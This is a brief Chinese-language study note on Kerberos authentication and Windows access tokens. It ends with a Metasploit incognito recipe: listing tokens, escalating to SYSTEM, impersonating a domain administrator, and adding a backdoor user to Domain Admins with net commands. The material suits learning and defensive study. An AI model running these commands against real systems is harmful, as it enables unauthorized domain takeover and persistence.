[TOC] ## Kerberos认证 Kerberos就是**提供一种单点登陆SSO的方法**，考虑这样一个场景，在一个网络中有不同的服务器，比如，打印服务器、邮件服务器和文件服务器。这些服务器都有认证的需求。很自然的，不可能让每个服务器自己实现一套认证系统，而是提供一个中心认证服务器（AS-Authentication Server）供这些服务器使用。**这样任何客户端就只需维护一个密码就能登录所有服务器。** ## Kerberos认证流程  1. 客户端向KDC的**AS服务**请求开具身份证明 2. AS服务认证成功后返回给客户端认证权证（**TGT**,黄金票据攻击需要伪造的票据） 3. 客户端拿着TGT到KDC的**TGS**服务买票。 4. TGS认证成功后返回给客户端服务票据(**ST**) 5. 客户端拿着**ST去访问服务**。 6. 服务向DC核实，返回相应的**服务资源** ## 令牌的用处 令牌(token)是系统的临时秘钥，相当于账号和密码，用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下，访问网络和系统资源，这些令牌将持续存在于系统中，除非系统重新启动。 ## 令牌的分类 * 访问令牌(Access Token)：表示访问控制操作主体的系统对象 * 会话令牌(Session Token)：交互会话中唯一的身份标识符。 * 密保令牌(Security Token)：又叫做认证令牌或硬件令牌，是一种计算机身份校验的物理设备，例如U盾 ## 令牌窃取利用 ~~~ msf建立会话 获取当前主机存在的令牌 use incognito 显示出当前存在的令牌 list_tokens –u 提权到system权限 使用getsystem提权到system 模拟令牌 impersonate_token "dongta\administrator" 增加域用户 • 增加域用户：net user test admin@123 /add /domain • 添加到域管组： net group “domain admins” test /add /domain ~~~